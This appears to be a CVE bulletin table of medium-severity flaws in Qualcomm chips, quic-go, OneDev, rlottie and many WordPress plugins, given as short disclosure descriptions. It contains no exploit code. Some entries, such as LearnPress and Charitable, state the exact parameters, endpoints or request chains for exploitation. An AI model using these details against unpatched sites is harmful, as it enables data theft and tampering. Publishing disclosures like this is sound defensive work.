| Qualcomm, Inc.--Snapdragon | Information Disclosure when resetting device to factory default settings through powerline interface allows unauthorized access to device configuration. | 2026-06-01 | 6.5 | CVE-2025-59601 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing IOCTL requests with mismatched API versions due to concurrent modification of user-space buffer. | 2026-06-01 | 6.4 | CVE-2025-59610 |
| Qualcomm, Inc.--Snapdragon | Memory corruption in diagnostic services due to absence of input validation | 2026-06-01 | 6.7 | CVE-2025-59611 |
| Qualcomm, Inc.--Snapdragon | Memory corruption in windows drivers while sending incorrect trusted application request | 2026-06-01 | 6.7 | CVE-2025-59612 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when output buffer size is smaller than input buffer size during data copying operation. | 2026-06-01 | 6.7 | CVE-2025-59613 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when sending random number generator command with insufficient output buffer size. | 2026-06-01 | 6.7 | CVE-2025-59614 |
| Qualcomm, Inc.--Snapdragon | Information Disclosure when processing advertisement frames with malformed MBSSID elements of insufficient length. | 2026-06-01 | 5.5 | CVE-2025-59609 |
| quic-go--quic-go | quic-go is an implementation of the QUIC protocol in Go. Prior to version 0.59.1, an attacker can cause excessive memory allocation in quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large trailer field section with many unique field names and/or large values. The implementation builds an `http.Header` for the corresponding `http.Request` or `http.Response`, while only enforcing limits on the size of the QPACK-compressed HEADERS frame, not on the decoded field section. This can lead to memory exhaustion. This is very similar to CVE-2025-64702. The difference is that this issue uses HTTP trailers, rather than HTTP headers, as the attack vector. A misbehaving or malicious peer can cause a denial-of-service (DoS) attack against quic-go's HTTP/3 servers or clients by triggering excessive memory allocation, potentially leading to crashes or resource exhaustion. This affects both servers and clients due to symmetric header construction. Version 0.59.1 enforces RFC 9114 decoded field section size limits for trailers as well. It incrementally decodes QPACK entries and checks the field section size after each entry, aborting the stream if an entry causes the limit to be exceeded. | 2026-06-04 | 5.3 | CVE-2026-40898 |
| raja3c--Tiled Gallery Carousel Without JetPack | The Tiled Gallery Carousel Without JetPack plugin for WordPress is vulnerable to stored cross-site scripting via the 'data-image-title' parameter in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 5.4 | CVE-2026-5191 |
| Red Hat--Multicluster Engine for Kubernetes | A flaw was found in NetworkManager. This local privilege escalation vulnerability exists in NetworkManager's dhclient backend when processing malformed Manufacturer Usage Description (MUD) URLs. A local user can exploit this flaw to escalate privileges by triggering a script via a crafted MUD URL, provided an administrator has explicitly configured NetworkManager to use dhclient. This issue does not affect default configurations of NetworkManager. | 2026-06-04 | 6.7 | CVE-2026-10805 |
| Red Hat--Red Hat Enterprise Linux 10 | An out-of-bounds read flaw was found in the X.Org X server and Xwayland in __glXDisp_ChangeDrawableAttributes(). A wrong size validation check can read a client-controlled number of bytes, exceeding the request buffer, leading to information disclosure. A write path also exists but requires byte-swapped clients which is disabled by default. | 2026-06-05 | 5.5 | CVE-2026-50262 |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free flaw was found in the X.Org X server and Xwayland in CreateSaverWindow(). A client can trigger a use-after-free read after changing window attributes and forcing the screen saver, leading to information disclosure. | 2026-06-05 | 5.5 | CVE-2026-50263 |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in OpenShift Container Platform. Completed pods with restartPolicy: Never do not count toward ResourceQuota pod limits, and Kubernetes events are not quota-scoped. A non-privileged user who can create pods in a namespace can exploit this to generate a large volume of events that accumulate in etcd, causing API server performance degradation across the cluster. | 2026-06-01 | 5 | CVE-2026-10533 |
| Red Hat--Red Hat Quay 3 | A flaw was found in Clair. The fetcher component makes outbound HTTP requests to attacker-supplied URIs from manifest layer descriptors without IP or scheme filtering. When PSK authentication is not configured (opt-in, not enforced by default), an unauthenticated attacker can submit a manifest with a URI pointing to internal services or cloud metadata endpoints. The SSRF is reflective for non-200 responses, leaking up to 256 bytes of error body content via CheckResponse error messages. Operator-managed Red Hat Quay deployments auto-configure PSK and are not exposed to the unauthenticated attack vector. | 2026-06-01 | 5.8 | CVE-2026-10517 |
| remix-run--react-router | React Router is a router for React. In versions 7.5.1 through 7.13.1, when using Framework Mode with pre-rendering enabled, improper neutralization of the HTTP `Location` header value can permit Cross-Site Scripting (XSS) in the statically generated HTML files if the redirect location comes from an untrusted source. This does not impact applications using Declarative Mode (`<BrowserRouter>`) or Data Mode (`createBrowserRouter/<RouterProvider>`). This is patched in version 7.13.2. | 2026-06-02 | 5.4 | CVE-2026-33244 |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Exposure in versions 7.0.0 - 7.0.14, via the 'slider.get.full' AJAX Action. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including raw social media API credentials: the Instagram OAuth token, Flickr API key, YouTube Data API key, and Facebook App ID, stored in any configured slider's settings. | 2026-06-01 | 4.3 | CVE-2026-9048 |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress in versions 6.0.0-6.7.55 and 7.0.0-7.0.14 is vulnerable to unauthorized modification of data. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Contributor-level access and above, to deactivate any active plugin installed on the site. | 2026-06-01 | 4.3 | CVE-2026-9050 |
| russellr--Tectite Forms | The Tectite Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on the admin_init function. This makes it possible for unauthenticated attackers to modify the plugin's settings, including the tectite_forms_button option, via a forged request via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9599 |
| Samsung Open Source--rlottie | Out-of-bounds read vulnerability in Samsung Open Source rlottie allows Overread Buffers. This issue affects rlottie: before 223a2a41ba4f462e4abe767bebba49a366c9b9fd. | 2026-06-04 | 6.1 | CVE-2026-10305 |
| Samsung Open Source--rlottie | Uncontrolled Recursion vulnerability in Samsung Open Source rlottie allows Oversized Serialized Data Payloads. This issue affects rlottie: before e2d19e3b150e0e4a9586fa90b56fd3061cc98945. | 2026-06-04 | 6.1 | CVE-2026-47306 |
| Samsung Open Source--rlottie | Stack-based buffer overflow vulnerability in Samsung Open Source rlottie allows Overflow Buffers. This issue affects rlottie: before ce72b35a7ad0dded03051d3aa0ef75321c3bd035. | 2026-06-04 | 6.1 | CVE-2026-47318 |
| Samsung Open Source--rlottie | Memory allocation with excessive size value vulnerability in Samsung Open Source rlottie allows Excessive Allocation. This issue affects rlottie: before 0b4e308fa88c72cbb60cc8a2c1d2c2ad89b101dd. | 2026-06-04 | 6.1 | CVE-2026-47319 |
| Samsung Open Source--rlottie | Access of uninitialized pointer, Uncontrolled Recursion vulnerability in Samsung Open Source rlottie allows Pointer Manipulation, Oversized Serialized Data Payloads. This issue affects rlottie: before eae37633fda13ac05b25c6c95aacea4bc33c80a3. | 2026-06-04 | 6.1 | CVE-2026-47320 |
| Samsung Open Source--rlottie | Integer overflow or wraparound vulnerability in Samsung Open Source rlottie allows Integer Attacks. This issue affects rlottie: before 21292665023e5074b38254432716866d00f1985f. | 2026-06-04 | 6.1 | CVE-2026-49510 |
| Samsung Open Source--rlottie | Out-of-bounds write vulnerability in Samsung Open Source rlottie allows Overflow Buffers. This issue affects rlottie: before dcfde72eae1b0464dc0dd760aec00ada6a148635. | 2026-06-04 | 6.1 | CVE-2026-8916 |
| Sekander Badsha--Crew HRM | Missing Authorization vulnerability in Sekander Badsha Crew HRM allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Crew HRM: from n/a through 1.2.2. | 2026-06-02 | 5.4 | CVE-2026-27351 |
| Siemens--RUGGEDCOM RST2428P | A vulnerability has been identified in RUGGEDCOM RST2428P (6GK6242-6PA00) (All versions < V4.0). The affected applications stores sensitive information in the browser cache when an authenticated user modify specific configurations. This could allow an authenticated attacker to access sensitive data stored in the browser. | 2026-06-02 | 5.7 | CVE-2026-41918 |
| smub--Charitable Donation Plugin for WordPress Fundraising with Recurring Donations & More | The Charitable - Donation Plugin for WordPress - Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insecure Direct Object Reference / Authorization Bypass leading to Arbitrary Attachment Deletion in versions up to, and including, 1.8.11.1 via the profile avatar update flow. This is due to the save_avatar() function in Charitable_Profile_Form calling wp_delete_attachment() on an attachment ID read from the user's 'avatar' meta without validating that the attachment is owned by the user, combined with Charitable_Data_Processor::process_picture() returning the raw posted value when no file is uploaded, allowing the 'avatar' user meta to be poisoned with any attacker-chosen attachment ID. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary attachments from the Media Library by performing a two-request chain (first poisoning the stored avatar meta value with a target attachment ID, then triggering deletion via a normal avatar upload). | 2026-06-05 | 4.3 | CVE-2026-10038 |
| smub--WPForms Easy Form Builder for WordPress Contact Forms, Payment Forms, Surveys, & More | The WPForms - Easy Form Builder for WordPress - Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to and including 1.10.0.1. This is due to the PayPal Commerce webhook endpoint processing unauthenticated JSON webhook payloads without verifying that the request originated from PayPal using the required HMAC-SHA256 webhook signature, and only checking whether the supplied event_type is whitelisted before dispatching the attacker-controlled resource data to handlers that update payment records. This makes it possible for unauthenticated attackers who know a valid PayPal subscription_id to forge PayPal webhook events and modify subscription payment records, such as reactivating a cancelled or suspended subscription by setting its subscription_status to active. | 2026-06-06 | 5.3 | CVE-2026-7792 |
| Soliloquywp--Soliloquy Lite | WordPress Soliloquy Lite 2.5.6 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by inserting script tags in the post title field. Attackers can submit POST requests to the post editing endpoint with script payloads in the post_title parameter, which are stored and executed when users preview the post. | 2026-06-04 | 6.4 | CVE-2019-25743 |
| SourceCodester--Human Resource Management | A vulnerability has been found in SourceCodester Human Resource Management 1.0. Affected by this vulnerability is an unknown functionality of the file /detailview.php of the component Employee View Page. Such manipulation of the argument employeeid leads to improper control of resource identifiers. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-06-02 | 4.3 | CVE-2026-10624 |
| SourceCodester--Online Boat Reservation System | A security vulnerability has been detected in SourceCodester Online Boat Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the component Administrative Endpoint. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Multiple endpoints are affected. | 2026-06-03 | 6.3 | CVE-2026-10693 |
| SourceCodester--Pet Grooming Management Software | A flaw has been found in SourceCodester Pet Grooming Management Software 1.0. Affected is an unknown function of the file /admin/. This manipulation causes file and directory information exposure. The attack can be initiated remotely. The exploit has been published and may be used. | 2026-06-01 | 5.3 | CVE-2026-10254 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this vulnerability is the function sell_statement of the file application/controllers/ShowForm.php. Such manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 5.3 | CVE-2026-10255 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability was determined in SourceCodester Pharmacy Sales and Inventory System up to 1.0. This issue affects the function create_supplier of the file /Export_csv/export of the component Supplier Creation Interface. This manipulation of the argument Address/Company Name causes csv injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2026-06-01 | 4.7 | CVE-2026-10248 |
| SourceCodester--Pizzafy Ecommerce System | A vulnerability was detected in SourceCodester Pizzafy Ecommerce System 1.0. Impacted is an unknown function of the file /admin/index.php. Performing a manipulation of the argument page results in file inclusion. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-06-02 | 6.3 | CVE-2026-10558 |
| SourceCodester--Pizzafy Ecommerce System | A flaw has been found in SourceCodester Pizzafy Ecommerce System 1.0. The affected element is an unknown function of the file /index.php. Executing a manipulation of the argument page can lead to file inclusion. The attack may be performed from remote. The exploit has been published and may be used. | 2026-06-02 | 6.3 | CVE-2026-10559 |
| SourceCodester--Ship Ferry Ticket Reservation System | A weakness has been identified in SourceCodester Ship Ferry Ticket Reservation System 1.0. This affects an unknown function of the file /admin/. This manipulation of the argument page causes improper authorization. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-06-04 | 6.3 | CVE-2026-10876 |
| SourceCodester--Water Billing Management System | A vulnerability was found in SourceCodester Water Billing Management System 1.0. Impacted is an unknown function of the file /admin/?page=user/manage_user of the component User Management Module. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2026-06-01 | 4.7 | CVE-2026-10237 |
| spacetime--Ad Inserter Ad Manager & AdSense Ads | The Ad Inserter - Ad Manager & AdSense Ads plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL Parameters in iframe Mode in all versions up to, and including, 2.8.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Exploitation requires that iframe mode (AI_OPTION_IFRAME) is enabled on at least one ad block displayed on the targeted page, which is a non-default but supported configuration commonly used for AdSense and JavaScript-based ads. | 2026-06-06 | 6.1 | CVE-2026-9280 |
| Spring--Spring Cloud Function | Under infinite recursion in the routing layer, request-handling can cause OOM error. Affected Spring Products and Versions: Spring Cloud Function 3.2.x: versions prior to 3.2.16 Spring Cloud Function 4.1.x: versions prior to 4.1.10 Spring Cloud Function 4.2.x: versions prior to 4.2.6 Spring Cloud Function 4.3.x: versions prior to 4.3.3 Spring Cloud Function 5.0.x: versions prior to 5.0.2 Older, unsupported versions are also affected. | 2026-06-01 | 5.7 | CVE-2026-40989 |
| Spring--Spring Cloud Function | OOM error is possible while attempting to add infinite amount of functions to Function Registry. Affected Spring Products and Versions: Spring Cloud Function 3.2.x: versions prior to 3.2.16 Spring Cloud Function 4.1.x: versions prior to 4.1.10 Spring Cloud Function 4.2.x: versions prior to 4.2.6 Spring Cloud Function 4.3.x: versions prior to 4.3.3 Spring Cloud Function 5.0.x: versions prior to 5.0.2 Older, unsupported versions are also affected. | 2026-06-01 | 5.7 | CVE-2026-40990 |
| spyrosvl--Simple SEO Slideshow | The Simple SEO Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.2.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. WordPress KSES does not strip malicious shortcode attribute values on post save, allowing contributor-level users to persist payloads that execute for any visitor, including administrators reviewing the post. | 2026-06-05 | 6.4 | CVE-2026-8900 |
| steipete--CodexBar | CodexBar prior to 0.32.0 contains a session cookie leakage vulnerability that allows network attackers to intercept imported browser session cookies by exploiting improper redirect handling for Amp and Ollama provider sessions. Attackers can position themselves on the network path to receive cleartext HTTP requests carrying imported session cookies when a provider-controlled redirect target issues a redirect to a cleartext HTTP endpoint within the same provider domain. | 2026-06-01 | 5.9 | CVE-2026-43625 |
| StormShield--StormShield Network Security | A vulnerability was discovered on Stormshield Network Security * 4.3.0 to 4.3.41, * 4.8.0 to 4.8.15, * 5.0.0 to 5.0.5 It is possible to execute a reflected XSS attack on the login API available on Stormshield SNS appliance by executing a script on the victim's machine. The risks include the theft of cookies or other sensitive data, as well as the modification of page behavior, for example, by redirecting the victim to malicious websites. | 2026-06-01 | 5.3 | CVE-2026-8474 |
| strawberry-graphql--strawberry | Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.71.0 through 0.315.6, the QueryDepthLimiter extension is vulnerable to an Application-level DOS due to a lack of cycle detection in fragment spreads. When a query contains circular fragment references the determine_depth function enters an infinite recursion, leading to a RecursionError and crashing the validation process. Version 0.315.7 patches the issue. | 2026-06-04 | 5.3 | CVE-2026-47706 |
| strawberry-graphql--strawberry | Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.172.0 through0.315.6, the MaxAliasesLimiter extension in Strawberry fails to account for the multiplicative/amplification effect of FragmentSpreadNode. While it correctly counts static aliases within the AST it does not consider how many times a fragments internal aliases are expanded during execution. this allows an attacker to bypass alias limits and force the server to resolve and render a significantly higher number of aliases than allowed, potentially leading to a dos via resource exhaustion. Version 0.315.7 contains a fix for the issue. | 2026-06-04 | 5.3 | CVE-2026-47707 |
| StylemixThemes--MasterStudy LMS Pro | The MasterStudy LMS Pro Plus plugin for WordPress is vulnerable to generic SQL Injection via the 'columns' parameter in all versions up to, and including, 4.8.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with instructor-level access or above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-06-04 | 6.5 | CVE-2026-8653 |
| Synology--Hyper Backup | An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in Backup.Repository webapi component in Synology Hyper Backup before 4.1.2-4036 allows remote authenticated users with administrator privileges to write specific files containing non-sensitive information via unspecified vectors. | 2026-06-03 | 4.1 | CVE-2024-47263 |
| Synology--Hyper Backup | An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in Backup Task functionality in Synology Hyper Backup before 4.1.2-4036 allows remote authenticated users to write specific files via unspecified vectors. | 2026-06-03 | 4.3 | CVE-2024-47273 |
| Synology--Synology Note Station Client | A cleartext transmission of sensitive information vulnerability in Synology Note Station Client before 2.2.4-703 allows man-in-the-middle attackers to obtain user credential. | 2026-06-03 | 5.9 | CVE-2023-52951 |
| takien--Word Replacer | The Word Replacer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'replacement' parameter in all versions up to, and including, 0.4. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 4.4 | CVE-2026-3620 |
| themeisle--RSS Aggregator by Feedzy Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator | The RSS Aggregator by Feedzy - Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to create and execute RSS import jobs, purge (force-delete) all posts associated with any import job, clear import error logs, and enumerate taxonomy terms and post meta_key names. The nonce required to reach these sub-handlers is leaked to any user with the edit_posts capability via the feedzyjs localized script injected into the block editor, meaning no privileged nonce theft or separate exploit step is required for Contributor-level users. | 2026-06-05 | 4.3 | CVE-2026-8976 |
| theonedev--onedev | A vulnerability has been found in theonedev onedev up to 15.0.5. Affected by this vulnerability is an unknown functionality of the file /projects. The manipulation of the argument project.forkedFromId leads to improper authorization. The attack is possible to be carried out remotely. Upgrading to version 15.0.6 addresses this issue. Upgrading the affected component is recommended. | 2026-06-06 | 6.3 | CVE-2026-11438 |
| theonedev--onedev | A vulnerability was found in theonedev onedev up to 15.0.5. Affected by this issue is some unknown functionality of the file /projects/ of the component Parent Project Handler. The manipulation of the argument project.parentId results in improper authorization. The attack may be performed from remote. Upgrading to version 15.0.6 can resolve this issue. It is recommended to upgrade the affected component. | 2026-06-06 | 6.3 | CVE-2026-11439 |
| theonedev--onedev | A vulnerability was determined in theonedev onedev up to 15.0.5. This affects an unknown part of the file /repositories/{projectId}/default-branch of the component REST API. This manipulation of the argument project.defaultBranch causes improper authorization. It is possible to initiate the attack remotely. Upgrading to version 15.0.6 is able to mitigate this issue. Upgrading the affected component is advised. | 2026-06-06 | 6.3 | CVE-2026-11440 |
| theonedev--onedev | A vulnerability was identified in theonedev onedev up to 15.0.5. This vulnerability affects the function canAccessIssue of the file /issues/ of the component Pull Request Handler. Such manipulation of the argument issue leads to improper authorization. It is possible to launch the attack remotely. Upgrading to version 15.0.6 is able to resolve this issue. It is advisable to upgrade the affected component. | 2026-06-06 | 6.3 | CVE-2026-11441 |
| thimpress--LearnPress Backup & Migration Tool | The LearnPress - Backup & Migration Tool plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.1.4 via deserialization of untrusted input . This makes it possible for authenticated attackers, with administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2026-06-06 | 6.6 | CVE-2026-7566 |
| thimpress--LearnPress Backup & Migration Tool | The LearnPress - Backup & Migration Tool plugin for WordPress is vulnerable to Arbitrary File Read via Directory Traversal in all versions up to, and including, 4.1.4 via the 'import-user-file' parameter parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-06-06 | 4.9 | CVE-2026-7565 |
| thimpress--LearnPress WordPress LMS Plugin for Create and Sell Online Courses | The LearnPress - WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.6 via the 'return_type' parameter. This makes it possible for unauthenticated attackers to extract sensitive data including the plaintext post_password of password-protected courses and the full post_content, post_author, and post_name of unpublished draft, private, and pending courses via the unrestricted SELECT * fallback query. Exploitation requires supplying both c_status=all (to bypass the publish-only post_status WHERE clause) and return_type=json (to prevent the safe DISTINCT(ID) AS ID field override) in a single unauthenticated request to the /wp-json/lp/v1/courses/archive-course endpoint. | 2026-06-06 | 5.3 | CVE-2026-8502 |
| ThimPress--Thim Core | Missing Authorization vulnerability in ThimPress Thim Core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Thim Core: from n/a through 2.3.3. | 2026-06-02 | 4.3 | CVE-2025-53346 |
| thorvg--thorvg | Thor Vector Graphics (ThorVG) is a production-ready vector graphics engine. Prior to version 1.0.5, a null pointer dereference in SvgLoader::run() allows any caller that passes untrusted SVG data to Picture::load() to crash the process with a 6-byte payload. This issue has been patched in version 1.0.5. | 2026-06-01 | 4.3 | CVE-2026-45729 |
| Tiobon--Employee Self-Service System | A vulnerability was found in Tiobon Employee Self-Service System up to 7.2. Affected by this vulnerability is an unknown functionality of the file /Blog/BlogSearch.aspx of the component Login Endpoint. The manipulation of the argument Keyword results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 6.3 | CVE-2026-11453 |
| Tips and Tricks HQ--WP eMember | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Tips and Tricks HQ WP eMember allows Retrieve Embedded Sensitive Data. This issue affects WP eMember: from n/a through v10.2.2. | 2026-06-04 | 5.3 | CVE-2026-49077 |
| tittuvarghese--CollegeManagementSystem | A security vulnerability has been detected in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. The impacted element is an unknown function of the file dashboard_page/forms/upload_student_data.php of the component Student Data Upload Endpoint. Such manipulation of the argument Student-Data-CSV leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 6.3 | CVE-2026-11333 |
| tittuvarghese--CollegeManagementSystem | A flaw has been found in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. This impacts the function session_start of the file /login-form.php. Executing a manipulation of the argument UserAuthData can lead to session fixiation. The attack can be launched remotely. The exploit has been published and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 6.3 | CVE-2026-11335 |
| tittuvarghese--CollegeManagementSystem | A vulnerability has been found in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. Affected is an unknown function of the file dashboard_page/admin_page.php of the component Admin Interface. The manipulation of the argument UserAuthData leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 6.3 | CVE-2026-11336 |
| tittuvarghese--CollegeManagementSystem | A vulnerability was found in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. Affected by this vulnerability is an unknown functionality of the file /dashboard_page/forms/fetch.php. The manipulation of the argument department_name results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 4.3 | CVE-2026-11337 |
| Trac d.o.o.--PDBM | The PDBM application relies on a static, hard‑coded secret embedded in the PDBM.exe executable. This secret is used by the application's encryption routines, including the function responsible for decrypting credentials stored in the product's configuration file. Because the secret is constant across installations, any attacker with sufficient local privileges can extract it from the binary. Once obtained, the secret allows the attacker to decrypt the stored password and authenticate as the user defined in the configuration file. In the affected version, this user account is configured with administrative privileges, granting full access to PDBM's management interface and its underlying operational functions. | 2026-06-01 | 6.4 | CVE-2026-25600 |
| vertex-app--vertex | A vulnerability was identified in vertex-app vertex up to 2026.02.12. This issue affects some unknown processing of the file app/model/LogMod.js of the component Log Viewer Endpoint. Such manipulation of the argument req.query leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used. The name of the patch is 805d82e7100d49b79b3beb1b9420e8e458987198. It is best practice to apply a patch to resolve this issue. | 2026-06-06 | 6.3 | CVE-2026-11408 |
| warmcat--libwebsockets | A flaw has been found in warmcat libwebsockets up to 4.5.8. This issue affects the function lws_ssh_parse_plaintext of the file plugins/protocol_lws_ssh_base/sshd.c of the component SSH Protocol Handler. Executing a manipulation of the argument msg_len can lead to resource consumption. The attack may be launched remotely. The exploit has been published and may be used. This patch is called 3f9f0c6ecaf0e6f3f219d30632c5d1f2479d7498. A patch should be applied to remediate this issue. | 2026-06-02 | 5.3 | CVE-2026-10650 |
| Web-Dorado--Contact Form Maker | Contact Form by WD 1.13.1 contains a cross-site request forgery vulnerability combined with local file inclusion that allows unauthenticated attackers to include arbitrary files by exploiting unsanitized action parameters. Attackers can craft malicious forms targeting the admin-ajax.php endpoint with directory traversal sequences in the GET action parameter to load files via CSRF, bypassing authentication on vulnerable AJAX actions. | 2026-06-04 | 4 | CVE-2019-25734 |
| webvitaly--Page-list | The Page-list plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.2. This is due to the pagelist_unqprfx_ext_shortcode() function (the [pagelist_ext] / [pagelistext] shortcode) accepting attacker-controlled post_status, post_type, and show_meta_key attributes and passing them directly into get_pages() and get_post_meta() with no capability check verifying that the rendering user is permitted to read the matched objects. When the current post has no child pages, the shortcode re-issues the query with child_of => 0, broadening it to every page on the site matching the supplied status/type. This makes it possible for authenticated attackers, with contributor-level access and above, to disclose the titles, body content/excerpts, and arbitrary post meta of unrelated private and draft pages by inserting the shortcode into a contributor-authored draft and previewing it. | 2026-06-06 | 4.3 | CVE-2026-9008 |
| wireapp--wire-ios | wire-ios is an iOS client for the Wire secure messaging application. Prior to version 4.16.0, upon receiving a crafted malicious Proteus external message with an encrypted payload that is shorter than 16 bytes, the Wire iOS client crashes. The crash is triggered automatically after message receival with no user interaction. Since the malicious message persists in the conversation, the app enters a crash loop on relaunch and cannot be reopened until the local state is wiped. This issue has been fixed with version 4.16.0 which introduces the missing length check and is available via the App Store. No known workarounds are available. | 2026-06-02 | 6.5 | CVE-2026-35049 |
| wonderwhy-er--DesktopCommanderMCP | A vulnerability was identified in wonderwhy-er DesktopCommanderMCP 0.2.37. This affects the function readFileFromUrl of the file src/tools/filesystem.ts of the component read_file. Such manipulation of the argument url leads to server-side request forgery. The attack may be performed from remote. The exploit is publicly available and might be used. The name of the patch is 53699bebba9950047bca16ac4dc8f0568f596aaa. It is best practice to apply a patch to resolve this issue. | 2026-06-02 | 6.3 | CVE-2026-10690 |
| wonderwhy-er--DesktopCommanderMCP | A security flaw has been discovered in wonderwhy-er DesktopCommanderMCP up to 0.2.38. This impacts an unknown function of the file src/search-manager.ts of the component start_search. Performing a manipulation of the argument SearchResult[] results in inefficient regular expression complexity. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.2.39 will fix this issue. The patch is named 4ce845f8749b6a159b57b38dcc3357f7222a8078. It is suggested to upgrade the affected component. | 2026-06-02 | 4.3 | CVE-2026-10691 |
| wpdevteam--EmbedPress PDF Embedder, Embed PDF viewer, YouTube Videos, 3D FlipBook, Social feeds & more | The EmbedPress - PDF Embedder, Embed PDF viewer, YouTube Videos, 3D FlipBook, Social feeds & more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the block 'url' attribute in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page | 2026-06-06 | 6.4 | CVE-2026-7796 |
